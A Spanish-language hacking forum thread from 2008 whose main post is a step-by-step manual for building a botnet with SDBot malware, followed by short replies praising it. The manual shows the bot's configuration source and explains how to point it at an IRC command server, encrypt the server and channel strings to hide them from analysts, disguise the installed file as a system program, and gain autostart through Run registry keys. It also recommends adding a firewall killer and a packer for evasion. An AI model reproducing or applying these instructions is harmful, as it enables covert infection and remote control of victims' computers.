hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
07 de Octubre de 2008, 09:54:19
Noticias: Privacidad - ¿Necesitas que se depure cierta informacion en nuestro portal?
Para ver este enlace Registrate o Inicia Sesion
> leer aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Troyanos y Virus (Moderadores: Suikodenman, Huex)
| | |-+  MANUAL: Montando BotNet con SDBot
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: MANUAL: Montando BotNet con SDBot  (Leído 596 veces)
RaKi0N
NZ5
*****
Desconectado Desconectado

Mensajes: 1,297


Muestralo con hechos,jamás con palabras


Ver Perfil
« : 09 de Mayo de 2008, 04:48:02 »

Créditos del autor: Tsunami
Recopilado de: vZack.com

1.- Descargar e instalar

Antes de nada nos bajamos el sdbot desde aqui:

Para ver este enlace Registrate o Inicia Sesion
y el lcc 3.2. (es con el que lo he compilado) desde
Para ver este enlace Registrate o Inicia Sesion

Instalamos el lcc en c:\lcc


2.- Configurando el bot

Descomprimimos el sdbot_syn_secu re_1.rar y buscamos el archivo SDBOT05B.C, lo abrimos con el notepad u otro editor de texto y nos situamos en la línea 71 donde esta la configuración del bot.
Código:
// bot configuration
 const char botid[] = "lit"; // bot id
 const char password[] = "$1$bleh$dPGEmrTPXe49ff1z/TCpA."; // bot
 const  int maxlogins = 1; // maximum number of simultaneous logins
 const char server[26] = "\xb3\xb6\x8e\x84\xdf\x83\x79\x70\x21\x37\x42\x46\x5c\x39"; // server
 const  int port = 6667; // server port
 const char serverpass[] = ""; // server password
 const char channel[26] = "\xf2\xb4\x88\x87\x95\x93\x60\x60\x7d\x19"; // channel that the bot should join
 const char chanpass[] = ""; // channel password
 const char server2[26] = "\x53\x33\x2b\x61\x3a\x32\x07\x0a\x1e\x10\xf2\xe4\xa0\xfb\xf9\xd7\xaa"; // backup server (optional)
 const  int port2 = 6667; // backup server port
 const char channel2[26] = "\x19\x35\x2d\x2c\x3e\x5d"; // backup channel (optional)
 const char chanpass2[] = ""; // backup channel password (optional)
 const BOOL topiccmd = TRUE; // set to TRUE to enable topic commands
 const BOOL rndfilename = FALSE; // use random file name
 const char filename[] = "ntdrv.exe"; // destination file name
 const BOOL regrun = TRUE; // use the Run registry key for autostart
 const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
 const char valuename[] = "NT Guard"; // value name for autostart
 const char prefix = '.'; // command prefix (one character max.)
 const char version[] = "*"; // bot's VERSION reply
 const  int cryptkey = 1488; // encryption key (use same key you used in the encrypt program)
 const  int maxaliases = 16; // maximum number of aliases (must be greater than the number of predefined aliases).

Algunos trozos de configuracion estan encriptados para que no los habran con un editor hexagesimal y vean a donde conecta el bot, asi que tendremos que encryptar la nueva configuracion que vamos a meter.

En la linea 92 esta la clave de encryptacion, abriremos el exe  tools/cryptstr.exe y pondra "cryptkey:", hay introduciremos 1488.

ahora procederemos ha encriptar nuestra nueva configuración

Código:
const char botid[] = "lit"; // bot id
Es el id del bot no tiene mucha importancia cambiarlo


Código:
const char password[] = "$1$bleh$dPGEmrTPXe49ff1z/TCpA."; // bot
Es la password del bot con la que nos loguearemos para que los bots nos hagan caso. Esta encriptada. Abrimos tools/mkpasswd.exe introducimos la contraseña que queremos, pulsamos enter y introducimos el salto que queramos.


Código:
const  int maxlogins = 1; // maximum number of simultaneous logins
Es el numero de personas que podrán controlar los bots al mismo tiempo recomiendo poner 1


Código:
const char server[26] = "\xb3\xb6\x8e\x84\xdf\x83\x79\x70\x21\x37\x42\x46\x5c\x39"; // server
el server al que conectaran los bots, lo encriptamos con elcryptstr.exe introduciendo de cryptkey 1488 y luego introducimos nuestro server.



Nos quedara algo así
Encriptamos ircdenial0fser vice.com ->
Código:
CryptKey:1488

Enter phrase to be encrypted:ircdenial0fservice.com
\xb8\xab\x82\x8d\x94\x97\x68\x68\x7d\x29\x47\x5a\x54\x4b\x37\x20\x32\x3c\x4f\x0a
\x1e\x14\x81

En ese caso reemplazaremos
Código:
const char server[26] = "\xb3\xb6\x8e\x84\xdf\x83\x79\x70\x21\x37\x42\x46\x5c\x39"; // server
por
Código:
const char server[26] = "\xb8\xab\x82\x8d\x94\x97\x68\x68\x7d\x29\x47\x5a\x54\x4b\x37\x20\x32\x3c\x4f\x0a
\x1e\x14\x81"; // server


Código:
const  int port = 6667; // server port
Es el puerto del servidor irc normalmente suele ser 6667 o 7000, cambialo or el de tu server


Código:
const char serverpass[] = ""; // server password
Es la contraseña del servidor de irc. (normalmente no llevan asi que dejarlo en blanco)


Código:
const char channel[26] = "\xf2\xb4\x88\x87\x95\x93\x60\x60\x7d\x19"; // channel that the bot should join
Es el canal al que entraran los bots (Encryptarlo como habeis echo con el server) No os olvideis del '#'

Código:
const char chanpass[] = ""; // channel password
La contraseña del canal...


Código:
const char server2[26] = "\x53\x33\x2b\x61\x3a\x32\x07\x0a\x1e\x10\xf2\xe4\xa0\xfb\xf9\xd7\xaa"; // backup server (optional)
 const  int port2 = 6667; // backup server port
 const char channel2[26] = "\x19\x35\x2d\x2c\x3e\x5d"; // backup channel (optional)
 const char chanpass2[] = ""; // backup channel password (optional)
Esto es otro server para que conecten los bots, dejarlo en blanco

Código:
const BOOL rndfilename = FALSE; // use random file name
Si quereis que se instale con un nombre aleatorio, boolean (true - false)


Código:
const char filename[] = "ntdrv.exe"; // destination file name
Si en la anterior habeis puesto true da igual que pongais aqui, si habeis puesto false poner el nombre del archivo que quedara. (tener en cuenta que se instala en el directorio de sistema, normalmente c:\windows\system32) es perfecto poner explorer.exe Cheesy

Código:
const BOOL regrun = TRUE; // use the Run registry key for autostart
Si queries que use la clave run para el autostart HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


Código:
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
Lo mismo pero con la clave runservices HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices


Código:
const char valuename[] = "NT Guard"; // value name for autostart
El nombre del valor de la clave, recomendado "explorador de windows" Cheesy

Código:
const char prefix = '.'; // command prefix (one character max.)
El prefijo que usara el bot para los comandos

Código:
const char version[] = "*"; // bot's VERSION reply
La versión que os dirá el bot, da igual cual pongáis


Código:
const  int cryptkey = 1488; // encryption key (use same key you used in the encrypt program)
Esta ya la hemos cambiado antes

Código:
const  int maxaliases = 16; // maximum number of aliases (must be greater than the number of predefined aliases).
Dejarlo como esta


3.- Compilando el bot

Si no lo habeis instalado en c:\lcc deveis cambiar la ruta mirando el codigo fuente de make-lcc.bat
Una vez configurado lo guardamos y abrimos el make-lcc.bat para compilarlo.
Si lo compila bien el sdbot05b.exe pesara 40.5 kb.


4.- Encriptando el bot

lo ideal es agregarle un firewall killer con algún joiner y después pasarle el themida. Eso ya son gustos.

Saludos y espero que os haya gustado, si vais a copiar este manual poner un link hacia vzack.com y el autor

Saludos!
En línea

¿El anonimato? ¿En la red? ¿Tu crees?
b#
NZ1
*
Desconectado Desconectado

Mensajes: 44


Ver Perfil
« Respuesta #1 : 09 de Mayo de 2008, 04:55:37 »

Muy bueno el manual RaKi0N

Saludos.
En línea
Suikodenman
Moderador
*****
Desconectado Desconectado

Mensajes: 2,419


WTF !!!!


Ver Perfil WWW
« Respuesta #2 : 10 de Mayo de 2008, 03:56:12 »

De verdad esta muy bueno, saludos.

Agregado el Tema al indice.
En línea


Para ver este enlace Registrate o Inicia Sesion

Trayendo la Información directamente a tu cerebro
Hondamena
NZ2
**
Desconectado Desconectado

Mensajes: 189



Ver Perfil WWW
« Respuesta #3 : 12 de Mayo de 2008, 08:20:13 »

gran manual Shocked sacado de
Para ver este enlace Registrate o Inicia Sesion
vZack
esa gran web...

si la quieren visitar:
Para ver este enlace Registrate o Inicia Sesion
clic aqui
o sino
Para ver este enlace Registrate o Inicia Sesion
clic aqui
En línea


Para ver este enlace Registrate o Inicia Sesion


Para ver este enlace Registrate o Inicia Sesion

vZack.com ONLINE Cheesy
vZor
NZ2
**
Desconectado Desconectado

Mensajes: 138



Ver Perfil WWW
« Respuesta #4 : 12 de Mayo de 2008, 08:26:20 »

primero nos copia el manual y luego nos dosea.. juajuajujjajua juajuajujaujaj uaj


magnifico manual claro xDDDD


En línea


Para ver este enlace Registrate o Inicia Sesion

http://foro.vzack.com/ Online Cheesy

Para ver este enlace Registrate o Inicia Sesion


Para ver este enlace Registrate o Inicia Sesion


Para ver este enlace Registrate o Inicia Sesion


Suikodenman
Moderador
*****
Desconectado Desconectado

Mensajes: 2,419


WTF !!!!


Ver Perfil WWW
« Respuesta #5 : 12 de Mayo de 2008, 09:47:29 »

primero nos copia el manual y luego nos dosea.. juajuajujjajua juajuajujaujaj uaj


magnifico manual claro xDDDD




Que tal si comienzas por decirle que respete las fuentes... sino lo hace avisame para ponerla yo mismo xico.
En línea


Para ver este enlace Registrate o Inicia Sesion

Trayendo la Información directamente a tu cerebro
Huex
Moderador Global
*****
Desconectado Desconectado

Mensajes: 4,678


- 01101010 *


Ver Perfil WWW
« Respuesta #6 : 13 de Mayo de 2008, 01:33:42 »

las fuentes estan en el post de rakion arriba  Tongue
En línea

No Respondo Dudas Por M.P.

Para ver este enlace Registrate o Inicia Sesion


Para ver este enlace Registrate o Inicia Sesion
Reglas Troyanos y Virus
\
Para ver este enlace Registrate o Inicia Sesion
Abrir puertos routers
\
Para ver este enlace Registrate o Inicia Sesion
Indetectar servers
\
Para ver este enlace Registrate o Inicia Sesion
NovirusThanks!

Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online